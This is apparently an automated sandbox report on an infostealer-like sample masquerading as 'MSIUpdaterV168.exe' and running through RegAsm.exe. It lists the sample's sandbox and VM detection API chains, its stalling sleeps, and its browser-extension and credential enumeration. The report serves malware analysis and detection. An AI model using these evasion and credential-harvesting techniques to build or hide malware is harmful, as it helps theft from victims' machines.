Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Sandbox detection routine: GetCursorPos, DecisionNode, Sleep

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Evasive API call chain: GetPEB, DecisionNodes, Sleep

Found stalling execution ending in API Sleep call

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Stalling execution: Execution stalls by calling Sleep

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

System information queried: FirmwareTableInformation

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: MSIUpdaterV168.exe, 0000002E.00000002.2014079426.0000000003370000.00000004.00000800.00020000.00000000.sdmp, 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1971057249.0000000002970000.00000004.00000800.00020000.00000000.sdmp, MSIUpdaterV168.exe, 00000037.00000002.2014227672.0000000002AA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE@\^Q
Source: MSIUpdaterV168.exe, 0000002E.00000002.2014079426.0000000003370000.00000004.00000800.00020000.00000000.sdmp, 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1971057249.0000000002970000.00000004.00000800.00020000.00000000.sdmp, MSIUpdaterV168.exe, 00000037.00000002.2014227672.0000000002AA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE`,^Q
Source: MSIUpdaterV168.exe, 0000002E.00000002.2014079426.0000000003370000.00000004.00000800.00020000.00000000.sdmp, 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1971057249.0000000002970000.00000004.00000800.00020000.00000000.sdmp, MSIUpdaterV168.exe, 00000037.00000002.2014227672.0000000002AA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE

Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Memory allocated: 16D0000 memory reserve \| memory write watch
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Memory allocated: 3240000 memory reserve \| memory write watch
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Memory allocated: 5240000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Memory allocated: CC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Memory allocated: 2840000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Memory allocated: 25C0000 memory reserve \| memory write watch
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Memory allocated: D40000 memory reserve \| memory write watch
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Memory allocated: 2970000 memory reserve \| memory write watch
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Memory allocated: 4970000 memory reserve \| memory write watch

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: GetCursorPos,GetCursorPos,GetCursorPos,Sleep,GetCursorPos,Sleep,GetCursorPos,

20_2_0045DB00

Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sqlt[1].dll

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API coverage: 7.5 %
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	API coverage: 10.0 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7628	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6252	Thread sleep count: 79 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1868	Thread sleep time: -120000s >= -30000s
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe TID: 2672	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe TID: 8176	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4136	Thread sleep count: 131 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4136	Thread sleep time: -917000s >= -30000s
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe TID: 7268	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 20_2_005449B0 GetSystemTime followed by cmp: cmp eax, 04h and CTI: jc 005449F1h

20_2_005449B0

Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Code function: 0_2_0033AAC7 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_0033AAC7
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Code function: 10_2_006EAAC7 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	10_2_006EAAC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004C6000 CreateDirectoryA,FindFirstFileA,FindNextFileA,GetLastError,FindClose,	20_2_004C6000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_00432022 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,	20_2_00432022
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004E6770 FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,GetLastError,std::_Throw_Cpp_error,std::_Throw_Cpp_error,CreateDirectoryA,std::_Throw_Cpp_error,std::_Throw_Cpp_error,	20_2_004E6770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004938D0 FindFirstFileA,FindNextFileA,GetLastError,FindClose,	20_2_004938D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_00493B60 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,SHGetFolderPathA,FindFirstFileA,FindNextFileA,FindClose,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,CopyFileA,CreateDirectoryA,CreateDirectoryA,CopyFileA,CopyFileA,CredEnumerateA,SHGetFolderPathA,GetPrivateProfileSectionNamesA,GetPrivateProfileStringA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrlenA,SHGetFolderPathA,GetPrivateProfileSectionNamesA,GetPrivateProfileStringA,lstrlenA,SHGetFolderPathA,GetPrivateProfileSectionNamesA,GetPrivateProfileStringA,lstrlenA,SHGetFolderPathA,GetPrivateProfileSectionNamesA,GetPrivateProfileStringA,lstrlenA,SHGetFolderPathA,GetPrivateProfileSectionNamesA,GetPrivateProfileStringA,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,lstrlenA,	20_2_00493B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004DFF00 CreateDirectoryA,FindFirstFileA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,GetLastError,GetLastError,CreateDirectoryA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetCurrentHwProfileA,GetModuleHandleExA,GetModuleFileNameA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetComputerNameA,GetUserNameA,GetDesktopWindow,GetWindowRect,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,GetLocalTime,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesA,EnumDisplayDevicesA,CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,RegOpenKeyExA,RegEnumKeyExA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,RegCloseKey,	20_2_004DFF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_00431F9C FindClose,FindFirstFileExW,GetLastError,	20_2_00431F9C
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Code function: 22_2_00E4D43A FindFirstFileExW,FindNextFileW,FindClose,FindClose,	22_2_00E4D43A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00409FC0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	24_2_00409FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0040C039 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	24_2_0040C039
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0040C6B5 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	24_2_0040C6B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00401443 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	24_2_00401443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0040BC98 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	24_2_0040BC98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_004164C7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,lstrcat,lstrcat,PathMatchSpecA,FindNextFileA,FindClose,	24_2_004164C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00416D7D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	24_2_00416D7D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0041738D GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	24_2_0041738D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_004177D3 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	24_2_004177D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0040E016 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	24_2_0040E016

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 20_2_004580D8 VirtualQuery,GetSystemInfo,

20_2_004580D8

Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Source: RegAsm.exe, 00000018.00000002.2942958827.000000000137E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW6
Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: RegAsm.exe, 00000014.00000002.1940927301.0000000000D30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: RegAsm.exe, 00000014.00000002.1941155556.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: MSIUpdaterV168.exe, 0000002E.00000002.2014079426.0000000003370000.00000004.00000800.00020000.00000000.sdmp, 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1971057249.0000000002970000.00000004.00000800.00020000.00000000.sdmp, MSIUpdaterV168.exe, 00000037.00000002.2014227672.0000000002AA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe`,^q
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: RegAsm.exe, 00000003.00000002.1989820350.000000000137B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1989820350.0000000001337000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.1941155556.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.1941155556.0000000000DC0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.1941155556.0000000000D97000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2942958827.000000000137E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000026.00000002.2004278407.0000000001369000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: RegAsm.exe, 00000003.00000002.1989820350.0000000001361000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWj
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: RegAsm.exe, 00000026.00000002.2003589511.0000000001335000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh-7
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: RegAsm.exe, 00000003.00000002.1990992096.00000000057A9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_~
Source: Amcache.hve.5.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: MSIUpdaterV168.exe, 0000002E.00000002.2014079426.0000000003370000.00000004.00000800.00020000.00000000.sdmp, 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1971057249.0000000002970000.00000004.00000800.00020000.00000000.sdmp, MSIUpdaterV168.exe, 00000037.00000002.2014227672.0000000002AA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe
Source: RegAsm.exe, 00000003.00000002.1989315863.00000000012D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&Ly
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: RegAsm.exe, 00000018.00000002.2942958827.000000000131A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8T8
